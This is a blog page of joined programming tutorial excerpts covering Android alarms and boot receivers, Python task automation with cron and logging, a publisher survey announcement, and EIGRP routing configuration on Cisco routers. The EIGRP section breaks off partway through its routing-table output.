Even though you are requesting permissions at runtime, the desired permission must be listed in the Android Manifest. If the permission is not specified, the OS will automatically deny the request.

How to schedule an alarm

Android provides AlarmManager to create and schedule alarms. Alarms offer the following features:

- Schedule alarms for a set time or interval
- Maintained by the OS, not your application, so alarms are triggered even if your application is not running or the device is asleep
- Can be used to trigger periodic tasks (such as an hourly news update), even if your application is not running
- Your app does not use resources (such as timers or background services), since the OS manages the scheduling

Alarms are not the best solution if you need a simple delay while your application is running (such as a short delay for a UI event).
For short delays, it's easier and more efficient to use a Handler, as we've done in several previous recipes.

When using alarms, keep these best practices in mind:

- Use as infrequent an alarm timing as possible
- Avoid waking up the device
- Use as imprecise timing as possible; the more precise the timing, the more resources required
- Avoid setting alarm times based on clock time (such as 12:00); add random adjustments if possible to avoid congestion on servers (especially important when checking for new content, such as weather or news)

Alarms have three properties, as follows:

- Alarm type (see the following list)
- Trigger time (if the time has already passed, the alarm is triggered immediately)
- Pending Intent

A repeating alarm has the same three properties, plus an interval:

- Alarm type (see the following list)
- Trigger time (if the time has already passed, it triggers immediately)
- Interval
- Pending Intent

There are four alarm types:

- RTC (Real Time Clock): This is based on the wall clock time. This does not wake the device.
- RTC_WAKEUP: This is based on the wall clock time. This wakes the device if it is sleeping.
- ELAPSED_REALTIME: This is based on the time elapsed since the device boot. This does not wake the device.
- ELAPSED_REALTIME_WAKEUP: This is based on the time elapsed since the device boot. This wakes the device if it is sleeping.

Elapsed real time is better for time-interval alarms, such as every 30 minutes.

Alarms do not persist after device reboots. All alarms are canceled when a device shuts down, so it is your app's responsibility to reset the alarms on device boot. The following recipe will demonstrate how to create alarms with AlarmManager.

Getting ready

Create a new project in Android Studio and call it Alarms. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type.

How to do it...

Setting an alarm requires a Pending Intent, which Android sends when the alarm is triggered.
Therefore, we need to set up a Broadcast Receiver to capture the alarm intent. Our UI will consist of just a simple button to set the alarm. To start, open the Android Manifest and follow these steps:

1. Add the following <receiver> to the <application> element, at the same level as the existing <activity> element:
2. Open activity_main.xml and replace the existing TextView with the following button:
3. Create a new Java class called AlarmBroadcastReceiver using the following code:

    public class AlarmBroadcastReceiver extends BroadcastReceiver {
        public static final String ACTION_ALARM =
                "com.packtpub.alarms.ACTION_ALARM";

        @Override
        public void onReceive(Context context, Intent intent) {
            if (ACTION_ALARM.equals(intent.getAction())) {
                Toast.makeText(context, ACTION_ALARM,
                        Toast.LENGTH_SHORT).show();
            }
        }
    }

4. Open MainActivity.java and add the method for the button click (note that thirty minutes is 30 * 60 * 1000 milliseconds):

    public void setAlarm(View view) {
        Intent intentToFire = new Intent(getApplicationContext(),
                AlarmBroadcastReceiver.class);
        intentToFire.setAction(AlarmBroadcastReceiver.ACTION_ALARM);
        PendingIntent alarmIntent = PendingIntent.getBroadcast(
                getApplicationContext(), 0, intentToFire, 0);
        AlarmManager alarmManager =
                (AlarmManager) getSystemService(Context.ALARM_SERVICE);
        long thirtyMinutes = SystemClock.elapsedRealtime()
                + 30 * 60 * 1000;
        alarmManager.set(AlarmManager.ELAPSED_REALTIME,
                thirtyMinutes, alarmIntent);
    }

5. You're ready to run the application on a device or emulator.

How it works...

Creating the alarm is done with this line of code:

    alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent);

Here's the method signature:

    set(AlarmType, Time, PendingIntent);

Prior to Android 4.4 KitKat (API 19), this was the method to request an exact time. Android 4.4 and later will consider this an inexact time for efficiency, but will not deliver the intent prior to the requested time. (See setExact() as follows if you need an exact time.)
To set the alarm, we create a Pending Intent with our previously defined alarm action:

    public static final String ACTION_ALARM =
            "com.packtpub.alarms.ACTION_ALARM";

This is an arbitrary string and could be anything we want, but it needs to be unique, so we prepend our package name. We check for this action in the Broadcast Receiver's onReceive() callback.

There's more...

If you click the Set Alarm button and wait for thirty minutes, you will see the Toast when the alarm triggers. If you are too impatient to wait and click the Set Alarm button again before the first alarm is triggered, you won't get two alarms. Instead, the OS will replace the first alarm with the new alarm, since they both use the same Pending Intent. (If you need multiple alarms, you need to create different Pending Intents, such as by using different Actions.)

Cancel the alarm

If you want to cancel the alarm, call the cancel() method, passing the same Pending Intent you used to create the alarm. If we continue with our recipe, this is how it would look:

    alarmManager.cancel(alarmIntent);

Repeating alarm

If you want to create a repeating alarm, use the setRepeating() method. The signature is similar to the set() method, but with an interval. This is shown as follows:

    setRepeating(AlarmType, Time (in milliseconds), Interval, PendingIntent);

For the interval, you can specify the interval time in milliseconds or use one of the predefined AlarmManager constants:

- INTERVAL_DAY
- INTERVAL_FIFTEEN_MINUTES
- INTERVAL_HALF_DAY
- INTERVAL_HALF_HOUR
- INTERVAL_HOUR

Receiving notification of device boot

Android sends out many intents during its lifetime. One of the first intents sent is ACTION_BOOT_COMPLETED. If your application needs to know when the device boots, you need to capture this intent. This recipe will walk you through the steps required to be notified when the device boots.

Getting ready

Create a new project in Android Studio and call it DeviceBoot.
Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type.

How to do it...

To start, open the Android Manifest and follow these steps:

1. Add the following permission:
2. Add the following <receiver> to the <application> element, at the same level as the existing <activity> element:
3. Create a new Java class called BootBroadcastReceiver using the following code:

    public class BootBroadcastReceiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            if (intent.getAction().equals(
                    "android.intent.action.BOOT_COMPLETED")) {
                Toast.makeText(context, "BOOT_COMPLETED",
                        Toast.LENGTH_SHORT).show();
            }
        }
    }

4. Reboot the device to see the Toast.

How it works...

When the device boots, Android will send the BOOT_COMPLETED intent. As long as our application has the permission to receive the intent, we will receive the notification in our Broadcast Receiver. There are three aspects to making this work:

- Permission for RECEIVE_BOOT_COMPLETED
- Adding both BOOT_COMPLETED and DEFAULT to the receiver intent filter
- Checking for the BOOT_COMPLETED action in the Broadcast Receiver

Obviously, you'll want to replace the Toast message with your own code, such as for recreating any alarms you might need.

Thus, in this article, we looked at different factors that need to be checked off before your app is ready for the Play Store. We discussed three topics: the Android 6.0 Runtime Permission model, scheduling an alarm, and detecting a device reboot. If you found this post useful, be sure to check out the book 'Android 9 Development Cookbook - Third Edition', to learn about the using AsyncTask for background work recipe, adding speech recognition to your app, and adding Google sign-in to your app.

Building an Android App using the Google Faces API [Tutorial]
How Android app developers can convert iPhone apps
6 common challenges faced by Android App developers
Bhagyashree R
10 Jan 2019
15 min read

Preparing and automating a task in Python [Tutorial]

To properly automate tasks, we need a platform so that they run automatically at the proper times. A task that needs to be run manually is not really fully automated. But, in order to be able to leave tasks running in the background while worrying about more pressing issues, each task needs to be able to run in fire-and-forget mode. We should be able to monitor that it runs correctly, be sure that we are capturing future actions (such as receiving notifications if something interesting arises), and know whether there have been any errors while running it. Ensuring that a piece of software runs consistently with high reliability is actually a very big deal, and is an area that, to be done properly, requires specialized knowledge and staff, who typically go by the names of sysadmin, operations, or SRE (Site Reliability Engineering).

In this article, we will learn how to prepare and automatically run tasks. It covers how to program tasks to be executed when they should be, instead of running them manually, and how to be notified if there has been an error in an automated process. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook. The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheet reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository.

Preparing a task

It all starts with defining exactly what task needs to be run and designing it in a way that doesn't require human intervention to run. Some ideal characteristics are as follows:

1. Single, clear entry point: No confusion about what the task to run is.
2. Clear parameters: If there are any parameters, they should be very explicit.
3. No interactivity: Stopping the execution to request information from the user is not possible.
4. The result should be stored: To be able to be checked at a different time than when it runs.
5. Clear result: If we are working interactively on a result, we accept more verbose results or progress reports. But, for an automated task, the final result should be as concise and to the point as possible.
6. Errors should be logged: To analyze what went wrong.

A command-line program has a lot of those characteristics already. It has a clear way of running, with defined parameters, and the result can be stored, even if just in text format. But it can be improved with a config file to clarify the parameters, and an output file.

Getting ready

We'll start by following a structure in which the main function will serve as the entry point, and all parameters are supplied to it. The definition of the main function with all the explicit arguments covers points 1 and 2. Point 3 is not difficult to achieve. To improve points 2 and 5, we'll look at retrieving the configuration from a file and storing the result in another.

How to do it...
1. Prepare the following task and save it as prepare_task_step1.py:

    import argparse

    def main(number, other_number):
        result = number * other_number
        print(f'The result is {result}')

    if __name__ == '__main__':
        parser = argparse.ArgumentParser()
        parser.add_argument('-n1', type=int, help='A number', default=1)
        parser.add_argument('-n2', type=int, help='Another number',
                            default=1)
        args = parser.parse_args()
        main(args.n1, args.n2)

2. Update the file to define a config file that contains both arguments, and save it as prepare_task_step2.py:

    import argparse
    import configparser

    def main(number, other_number):
        result = number * other_number
        print(f'The result is {result}')

    if __name__ == '__main__':
        parser = argparse.ArgumentParser()
        parser.add_argument('-n1', type=int, help='A number', default=1)
        parser.add_argument('-n2', type=int, help='Another number',
                            default=1)
        parser.add_argument('--config', '-c',
                            type=argparse.FileType('r'),
                            help='config file')
        args = parser.parse_args()
        if args.config:
            config = configparser.ConfigParser()
            config.read_file(args.config)
            # Transforming values into integers
            args.n1 = int(config['ARGUMENTS']['n1'])
            args.n2 = int(config['ARGUMENTS']['n2'])
        main(args.n1, args.n2)

3. Create the config file config.ini:

    [ARGUMENTS]
    n1=5
    n2=7

4. Run the command with the config file. Note that the config file overrides the command-line parameters:

    $ python3 prepare_task_step2.py -c config.ini
    The result is 35
    $ python3 prepare_task_step2.py -c config.ini -n1 2 -n2 3
    The result is 35

5. Add a parameter to store the result in a file, and save it as prepare_task_step5.py:

    import argparse
    import sys
    import configparser

    def main(number, other_number, output):
        result = number * other_number
        print(f'The result is {result}', file=output)

    if __name__ == '__main__':
        parser = argparse.ArgumentParser()
        parser.add_argument('-n1', type=int, help='A number', default=1)
        parser.add_argument('-n2', type=int, help='Another number',
                            default=1)
        parser.add_argument('--config', '-c',
                            type=argparse.FileType('r'),
                            help='config file')
        parser.add_argument('-o', dest='output',
                            type=argparse.FileType('w'),
                            help='output file', default=sys.stdout)
        args = parser.parse_args()
        if args.config:
            config = configparser.ConfigParser()
            config.read_file(args.config)
            # Transforming values into integers
            args.n1 = int(config['ARGUMENTS']['n1'])
            args.n2 = int(config['ARGUMENTS']['n2'])
        main(args.n1, args.n2, args.output)

6. Run it to check that it's sending the output to the defined file:

    $ python3 prepare_task_step5.py -n1 3 -n2 5 -o result.txt
    $ cat result.txt
    The result is 15
    $ python3 prepare_task_step5.py -c config.ini -o result2.txt
    $ cat result2.txt
    The result is 35

How it works...

Note that the argparse module allows us to define files as parameters, with the argparse.FileType type, and opens them automatically. This is very handy and will raise an error if the file is not valid.

The configparser module allows us to use config files with ease. As demonstrated in Step 2, the parsing of the file is as simple as follows:

    config = configparser.ConfigParser()
    config.read_file(file)

The config will then be accessible as a dictionary divided by sections, and then values. Note that the values are always stored in string format, requiring them to be transformed into other types, such as integers; here, they are read from the [ARGUMENTS] section defined in config.ini.

Python 3 allows us to pass a file parameter to the print function, which will write to that file. Step 5 shows the usage to redirect all the printed information to a file. Note that the default parameter is sys.stdout, which will print the value to the Terminal (standard output). This means that calling the script without an -o parameter will display the information on the screen, which is helpful in debugging:

    $ python3 prepare_task_step5.py -c config.ini
    The result is 35
    $ python3 prepare_task_step5.py -c config.ini -o result.txt
    $ cat result.txt
    The result is 35

Setting up a cron job

Cron is an old-fashioned but reliable way of executing commands.
It has been around since the 70s in Unix, and it's an old favorite in system administration for performing maintenance, such as freeing space, rotating logs, making backups, and other common operations.

Getting ready

We will produce a script, called cron.py:

    import argparse
    import sys
    from datetime import datetime
    import configparser

    def main(number, other_number, output):
        result = number * other_number
        print(f'[{datetime.utcnow().isoformat()}] The result is {result}',
              file=output)

    if __name__ == '__main__':
        parser = argparse.ArgumentParser(
            formatter_class=argparse.ArgumentDefaultsHelpFormatter)
        parser.add_argument('--config', '-c',
                            type=argparse.FileType('r'),
                            help='config file',
                            default='/etc/automate.ini')
        parser.add_argument('-o', dest='output',
                            type=argparse.FileType('a'),
                            help='output file', default=sys.stdout)
        args = parser.parse_args()
        if args.config:
            config = configparser.ConfigParser()
            config.read_file(args.config)
            # Transforming values into integers
            args.n1 = int(config['ARGUMENTS']['n1'])
            args.n2 = int(config['ARGUMENTS']['n2'])
        main(args.n1, args.n2, args.output)

Note the following details:

- The config file is, by default, /etc/automate.ini. Reuse config.ini from the previous recipe.
- A timestamp has been added to the output. This makes it explicit when the task is run.
- The result is appended to the file, as shown by the 'a' mode in which the file is opened.
- The ArgumentDefaultsHelpFormatter parameter automatically adds information about default values when printing the help using the -h argument.

Check that the task is producing the expected result and that you can log to a known file:

    $ python3 cron.py
    [2018-05-15 22:22:31.436912] The result is 35
    $ python3 cron.py -o /path/automate.log
    $ cat /path/automate.log
    [2018-05-15 22:28:08.833272] The result is 35

How to do it...

1. Obtain the full path of the Python interpreter. This is the interpreter that's in your virtual environment:

    $ which python
    /your/path/.venv/bin/python

2. Prepare the cron job to be executed. Get the full path and check that it can be executed with no problem. Execute it a couple of times:

    $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log
    $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log

3. Check that the result is being added correctly to the result file:

    $ cat /path/automate.log
    [2018-05-15 22:28:08.833272] The result is 35
    [2018-05-15 22:28:10.510743] The result is 35

4. Edit the crontab file to run the task once every five minutes:

    $ crontab -e
    */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log

Note that this opens an editing Terminal with your default command-line editor.

5. Check the crontab contents. Note that this displays the crontab contents, but doesn't set it for editing:

    $ crontab -l
    */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log

6. Wait and check the result file to see how the task is being executed:

    $ tail -F /path/automate.log
    [2018-05-17 21:20:00.611540] The result is 35
    [2018-05-17 21:25:01.174835] The result is 35
    [2018-05-17 21:30:00.886452] The result is 35

How it works...

The crontab line consists of a description of how often to run the task (the first five fields), plus the task itself. Each of the five initial fields means a different unit of time. Most of them are stars, meaning any:

    * * * * *
    | | | | |
    | | | | +---- Day of the Week (range: 0-6, 0 standing for Sunday; 7 is also accepted as Sunday)
    | | | +------ Month of the Year (range: 1-12)
    | | +-------- Day of the Month (range: 1-31)
    | +---------- Hour (range: 0-23)
    +------------ Minute (range: 0-59)

Therefore, our line, */5 * * * *, means "every time the minute is divisible by 5, in all hours, all days... all years".
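The field matching just described can be sketched in plain Python. This is illustrative only — cron itself does the real scheduling, and the function names below are ours, not part of cron. Step values such as */5 are handled as simple divisibility checks, which matches the minute and hour fields (whose ranges start at 0) but is a simplification for fields that start at 1:

```python
from datetime import datetime

def field_matches(field, value):
    """Check one crontab field ('*', '*/step', a number, or a comma list)."""
    for part in field.split(','):
        if part == '*':
            return True
        if part.startswith('*/'):
            # Simplified step handling: divisibility, as in the minute field
            if value % int(part[2:]) == 0:
                return True
        elif int(part) == value:
            return True
    return False

def cron_matches(expr, when):
    """True if 'when' satisfies a five-field minute/hour/dom/month/dow expression."""
    minute, hour, dom, month, dow = expr.split()
    return (field_matches(minute, when.minute)
            and field_matches(hour, when.hour)
            and field_matches(dom, when.day)
            and field_matches(month, when.month)
            # cron: Sunday is 0; datetime.weekday(): Monday is 0
            and field_matches(dow, (when.weekday() + 1) % 7))

# The recipe's schedule fires at any minute divisible by five:
print(cron_matches('*/5 * * * *', datetime(2018, 5, 17, 21, 25)))  # True
print(cron_matches('*/5 * * * *', datetime(2018, 5, 17, 21, 27)))  # False
```

Running this against the timestamps in the tail output above shows why the entries land at 21:20, 21:25, and 21:30.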
Here are some examples:

- 30 15 * * * means "every day at 15:30"
- 30 * * * * means "every hour, at 30 minutes past"
- 0,30 * * * * means "every hour, at 0 minutes and 30 minutes past"
- */30 * * * * means "every half hour"
- 0 0 * * 1 means "every Monday at 00:00"

Do not try to guess too much. Use a cheat sheet such as crontab guru for examples and tweaks. Most of the common usages are described there directly. You can also edit a formula and get a descriptive text on how it's going to run.

The crontab line is the description of how often to run the job, followed by the line that executes the task, as prepared in Step 2 of the How to do it… section.

Capturing errors and problems

An automated task's main characteristic is its fire-and-forget quality. We are not actively looking at the result, but making it run in the background. This recipe will present an automated task that will safely store unexpected behaviors in a log file that can be checked afterward.

Getting ready

As a starting point, we'll use a task that will divide two numbers, as described in the command line.

How to do it...
1. Create the task_with_error_handling_step1.py file, as follows:

    import argparse
    import sys

    def main(number, other_number, output):
        result = number / other_number
        print(f'The result is {result}', file=output)

    if __name__ == '__main__':
        parser = argparse.ArgumentParser()
        parser.add_argument('-n1', type=int, help='A number', default=1)
        parser.add_argument('-n2', type=int, help='Another number',
                            default=1)
        parser.add_argument('-o', dest='output',
                            type=argparse.FileType('w'),
                            help='output file', default=sys.stdout)
        args = parser.parse_args()
        main(args.n1, args.n2, args.output)

2. Execute it a couple of times to see that it divides two numbers:

    $ python3 task_with_error_handling_step1.py -n1 3 -n2 2
    The result is 1.5
    $ python3 task_with_error_handling_step1.py -n1 25 -n2 5
    The result is 5.0

3. Check that dividing by 0 produces an error, and that the error is not logged in the result file:

    $ python task_with_error_handling_step1.py -n1 5 -n2 1 -o result.txt
    $ cat result.txt
    The result is 5.0
    $ python task_with_error_handling_step1.py -n1 5 -n2 0 -o result.txt
    Traceback (most recent call last):
      File "task_with_error_handling_step1.py", line 20, in <module>
        main(args.n1, args.n2, args.output)
      File "task_with_error_handling_step1.py", line 6, in main
        result = number / other_number
    ZeroDivisionError: division by zero
    $ cat result.txt

4. Create the task_with_error_handling_step4.py file:

    import argparse
    import logging
    import sys

    LOG_FORMAT = '%(asctime)s %(name)s %(levelname)s %(message)s'
    LOG_LEVEL = logging.DEBUG

    def main(number, other_number, output):
        logging.info(f'Dividing {number} between {other_number}')
        result = number / other_number
        print(f'The result is {result}', file=output)

    if __name__ == '__main__':
        parser = argparse.ArgumentParser()
        parser.add_argument('-n1', type=int, help='A number', default=1)
        parser.add_argument('-n2', type=int, help='Another number',
                            default=1)
        parser.add_argument('-o', dest='output',
                            type=argparse.FileType('w'),
                            help='output file', default=sys.stdout)
        parser.add_argument('-l', dest='log', type=str,
                            help='log file', default=None)
        args = parser.parse_args()
        if args.log:
            logging.basicConfig(format=LOG_FORMAT, filename=args.log,
                                level=LOG_LEVEL)
        else:
            logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL)
        try:
            main(args.n1, args.n2, args.output)
        except Exception as exc:
            logging.exception(exc)
            exit(1)

5. Run it to check that it displays the proper INFO and ERROR logs, and that it stores them in the log file:

    $ python3 task_with_error_handling_step4.py -n1 5 -n2 0
    2018-05-19 14:25:28,849 root INFO Dividing 5 between 0
    2018-05-19 14:25:28,849 root ERROR division by zero
    Traceback (most recent call last):
      File "task_with_error_handling_step4.py", line 31, in <module>
        main(args.n1, args.n2, args.output)
      File "task_with_error_handling_step4.py", line 10, in main
        result = number / other_number
    ZeroDivisionError: division by zero
    $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log
    $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log
    $ cat error.log
    2018-05-19 14:26:15,376 root INFO Dividing 5 between 0
    2018-05-19 14:26:15,376 root ERROR division by zero
    Traceback (most recent call last):
      File "task_with_error_handling_step4.py", line 33, in <module>
        main(args.n1, args.n2, args.output)
      File "task_with_error_handling_step4.py", line 11, in main
        result = number / other_number
    ZeroDivisionError: division by zero
    2018-05-19 14:26:19,960 root INFO Dividing 5 between 0
    2018-05-19 14:26:19,961 root ERROR division by zero
    Traceback (most recent call last):
      File "task_with_error_handling_step4.py", line 33, in <module>
        main(args.n1, args.n2, args.output)
      File "task_with_error_handling_step4.py", line 11, in main
        result = number / other_number
    ZeroDivisionError: division by zero

How it works...

To properly capture any unexpected exceptions, the main function should be wrapped in a try-except block, as done in Step 4 of the How to do it… section.
Compare this to how Step 1 does not wrap the code:

    try:
        main(...)
    except Exception as exc:
        # Something went wrong
        logging.exception("Error running task")
        exit(1)

The extra step of exiting with status 1, via the exit(1) call, informs the operating system that something went wrong with our script.

The logging module allows us to log. Note the basic configuration, which includes an optional file to store the logs, the format, and the level of the logs to display. Creating logs is easy. You can do this by making a call to the logging.<logging level> method (where logging level is debug, info, and so on). logging.exception() is a special case that will create an ERROR log, but will also include information about the exception, such as the stack trace.

Remember to check the logs to discover errors. A useful reminder is to add a note to the results file, like this:

    try:
        main(args.n1, args.n2, args.output)
    except Exception as exc:
        logging.exception(exc)
        print('There has been an error. Check the logs', file=args.output)

In this article, we saw how to define and design a task so that no human intervention is needed to run it. We learned how to use cron to automate a task. We also presented an automated task that safely stores unexpected behaviors in a log file that can be checked afterward. If you found this post useful, do check out the book Python Automation Cookbook to develop a clear understanding of how to automate your business processes using Python. This includes detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheet reports with graphs, and communicating with automatically generated emails.

Write your first Gradle build script to start automating your project [Tutorial]
Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial]
Automating OpenStack Networking and Security with Ansible 2 [Tutorial]
Packt Editorial Staff
09 Jan 2019
3 min read

Pay it Forward this New Year – Rewriting the code on career development

This Festive and New Year period, Packt Publishing Ltd are commissioning their newest group of authors – you, the everyday expert – in order to help the next generation of developers, coders, and architects. Packt, a global leader in publishing technology and coding eBooks and videos, are asking the technology community to 'pay it forward' by looking back at their career and paying their advice forward to support the next generation of technology leaders via a survey. The aim is to rewrite the code on career development and find out what everyday life looks like for those in our community. The Pay it Forward eBook that will be created will provide tips and insights from the tech profession.

Rather than giving off-the-shelf advice on how to better your career, Packt are asking everyday experts – the professionals across the globe who make the industry tick – for the insights and advice they would give from the good and the bad that they have seen. The most insightful and useful responses to the survey will be published by Packt in a new eBook, which will be available for free in early 2019.

Some of the questions Pay it Forward will seek answers to include:

- What is the biggest myth about working in tech?
- If you could give one career hack, what would it be?
- How do you keep on top of new developments and news?
- What are the common challenges you have seen or experienced in your profession?
- Who do you most admire and why?
- What is the best piece of advice you have received that has helped you in your career?
- What advice would you give to a student wishing to enter your profession?
- Have you actually broken the internet? We all make mistakes; how do you handle them?
- What do you love about what you do?

People can offer their responses here: http://payitforward.packtpub.com/

Commenting on Pay it Forward, Packt Publishing Ltd CEO and founder Dave Maclean said, "Over time we all gain knowledge through our experiences. We've all failed and learned and found better ways to do things. As we come into the New Year, we're reflecting on what we have learned and we're calling on our community of everyday experts to share their knowledge with people who are new to the industry, to the next generation of changemakers."

"For our part, Packt will produce a book that pulls together this advice and make it available for free to help those wishing to pursue a career within technology."

The survey should take no more than 10 minutes to complete and is in complete confidence, with no disclosure of names or details unless agreed.

Amrata Joshi
09 Jan 2019
13 min read

Implementing the EIGRP Routing Protocol [Tutorial]

EIGRP originated from the Interior Gateway Routing Protocol (IGRP). The problem with IGRP was that it had no support for Variable Length Subnet Masking (VLSM) and it was broadcast-based. With the Enhanced Interior Gateway Routing Protocol, we now have support for VLSM, and the updates are sent via multicast, using the multicast address 224.0.0.10 for IPv4.

This article is an excerpt taken from the book CCNA Routing and Switching 200-125 Certification Guide by Lazaro (Laz) Diaz. This book covers the understanding of networking using routers and switches, layer 2 technology and its various configurations and connections, VLANs and inter-VLAN routing, and more. You can learn how to configure default, static, and dynamic routing, how to design and implement subnetted IPv4 and IPv6 addressing schemes, and more. This article focuses on how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems.

EIGRP has a lot more to offer than its predecessor. Not only is it a classless routing protocol with VLSM capabilities, it has a maximum hop count of 255, although by default this is set to 100. It is also considered a hybrid, or advanced distance-vector, routing protocol. That means it has the best of both worlds, combining link-state and distance-vector (DV) features. The DV features are just like RIPv2's: it has limited hop counts, it will send out the complete routing table to its neighboring routers the first time it tries to converge, and it will summarize routes, so you would have to use the no auto-summary command for it to send out the subnet mask along with the updates. It has link-state features, such as triggered updates after it has fully converged and the routing table is complete: EIGRP will maintain neighbor relationships, or adjacencies, using hello messages, and when a network is added or removed, it will only send that change. EIGRP also has a very intelligent algorithm.
The DUAL algorithm will consider several attributes in order to make a more efficient and reliable decision as to which path it will use to send the packet so that it reaches the destination faster. Also, EIGRP is based on autonomous systems, with a range from 1-65,535. You can have a single autonomous system, which means all the routers are sharing the same routing table, or you can have multiple autonomous systems, in which case you would have to redistribute the routes into the other AS for the routers to communicate with each other. So, EIGRP is a very powerful routing protocol and it has a lot of benefits that allow us to run our network more efficiently. So, let's create a list of the major features:

- Support for VLSM or CIDR
- Summarization and discontiguous networks
- Best path selection using the DUAL
- No broadcast; we use multicast now
- Supports IPv4 and IPv6
- Efficient neighbor discovery

Diffusing Update Algorithm or DUAL

This is the algorithm that allows EIGRP to have all the features it has and allows traffic to be so reliable. The following is a list of the essential tasks that it does:

- Finds a backup route if the topology permits
- Supports VLSM
- Performs dynamic route recovery
- Queries its neighbor routers for other alternate routes

EIGRP routers maintain a copy of all their neighbors' routes, so they can calculate their own cost to each destination network. That way, if the successor route goes down, they can query the topology table for alternate or backup routes. This is what makes EIGRP so awesome, since it keeps all the routes from its neighbors and, if a route goes down, it can query the topology table for an alternate route. But what if the query to the topology table does not work? Well, EIGRP will then ask its neighbors for help to find an alternate path! The DUAL strategy, and the reliability and leveraging of other routers, make it the quickest protocol to converge on a network.
For DUAL to work, it must meet the following three requirements:

- Neighbors are discovered, or noted as dead, within a finite time
- Messages that are transmitted should be received correctly
- Messages and changes received must be dealt with in the order they were received

The following command will show you those hello messages received, and more:

R1#sh ip eigrp traffic
IP-EIGRP Traffic Statistics for process 100
Hellos sent/received: 56845/37880
Updates sent/received: 9/14
Queries sent/received: 0/0
Replies sent/received: 0/0
Acks sent/received: 14/9
Input queue high water mark 1, 0 drops
SIA-Queries sent/received: 0/0
SIA-Replies sent/received: 0/0

If you wanted to change the default hello timer to something greater, the command would be the following:

Remember that this command is typed under interface configuration mode.

Configuring EIGRP

EIGRP also works with tables. The routing table, topology table, and neighbor table all work together to make sure that, if a path to a destination network fails, the routing protocol always has an alternate path to that network. The best path is chosen by the FD, or feasible distance. The route with the lowest FD is the successor route and is placed in the routing table. Routes with a higher FD remain in the topology table as feasible successors. So, EIGRP is a very reliable protocol. Let's configure it.

The following topology is going to be a full mesh, with LANs on each router. This will add to the complexity of the lab, so we can look at everything we have talked about. Before we begin the configurations, we must know the IP addressing scheme of each device.
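The hello-timer command itself appears as a screenshot in the book. As a hedged sketch (the AS number 100 and the 15-second value here are placeholders), it takes this general form:

```
R1(config)# interface s0/0/0
R1(config-if)# ip hello-interval eigrp 100 15
```

If you change the hello interval, it is usually worth adjusting the hold time on the same interface to match (for example, ip hold-time eigrp 100 45), since IOS does not adjust it automatically.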
The following table shows the addresses, gateways, and masks of each device:

We must also learn which routing protocol is in use, using our show commands:

R1#sh ip protocols
Routing Protocol is "eigrp 100 "
Outgoing update filter list for all interfaces is not set
Incoming update filter list for all interfaces is not set
Default networks flagged in outgoing updates
Default networks accepted from incoming updates
EIGRP metric weight K1=1, K2=0, K3=1, K4=0, K5=0
EIGRP maximum hopcount 100
EIGRP maximum metric variance 1
Redistributing: eigrp 100
Automatic network summarization is not in effect
Maximum path: 4
Routing for Networks:
192.168.1.0
10.0.0.0
Routing Information Sources:
Gateway Distance Last Update
10.1.1.10 90 1739292
10.1.1.22 90 1755881
10.1.1.6 90 1774985
Distance: internal 90 external 170

Okay, you have the topology, the IP scheme, the routing protocol to use, and its autonomous system. As you can see, I have already configured the lab, but now it's your turn. You will have to configure it to follow along with the show commands we are about to run. You should, by now, know your admin commands. The first thing you need to worry about is connectivity, so I will show you the output of the sh ip int brief command from each router:

As you can see, all my interfaces have the correct IPv4 addresses and they are all up; your configuration should be the same. If you also want to see the subnet mask, a command similar to sh ip int brief is sh protocols:

After you have checked that all your interfaces are up and running, it is time to configure the routing protocol. We will be using a single autonomous system, with the number 100 on all the routers, so they can share the same routing table. Through the use of hello messages, they will discover their neighbors.
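The per-router EIGRP configuration appears as a screenshot in the book. As a sketch for R1 under the addressing above, with AS 100 (the other routers advertise their own connected networks the same way), it would look something like this:

```
R1(config)# router eigrp 100
R1(config-router)# network 10.0.0.0
R1(config-router)# network 192.168.1.0
R1(config-router)# no auto-summary
```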
The configuration of the EIGRP protocol should look like this per router:

As you can see, we are using the autonomous system number 100 on all routers, and when we advertise the networks, especially the 10.1.1.0 network, we use the classful boundary, which is a Class A network. We must not forget the no auto-summary command, or EIGRP will not send the subnet mask in its updates. Now, let's check our routing tables to see whether we have converged fully, meaning we have found all our networks:

R2

R2#SH IP ROUTE
Gateway of last resort is not set
10.0.0.0/30 is subnetted, 6 subnets
D 10.1.1.4 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1
C 10.1.1.8 is directly connected, Serial0/0/0
D 10.1.1.12 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1
C 10.1.1.16 is directly connected, Serial0/0/1
D 10.1.1.20 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0
[90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1
C 10.1.1.24 is directly connected, FastEthernet0/1
D 192.168.1.0/24 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0
C 192.168.2.0/24 is directly connected, FastEthernet0/0
D 192.168.3.0/24 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1
D 192.168.4.0/24 [90/30720] via 10.1.1.26, 02:27:38, FastEthernet0/1

R3

R3#sh ip route
Gateway of last resort is not set
10.0.0.0/30 is subnetted, 6 subnets
D 10.1.1.4 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1
D 10.1.1.8 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1
C 10.1.1.12 is directly connected, Serial0/0/1
C 10.1.1.16 is directly connected, Serial0/0/0
C 10.1.1.20 is directly connected, FastEthernet0/1
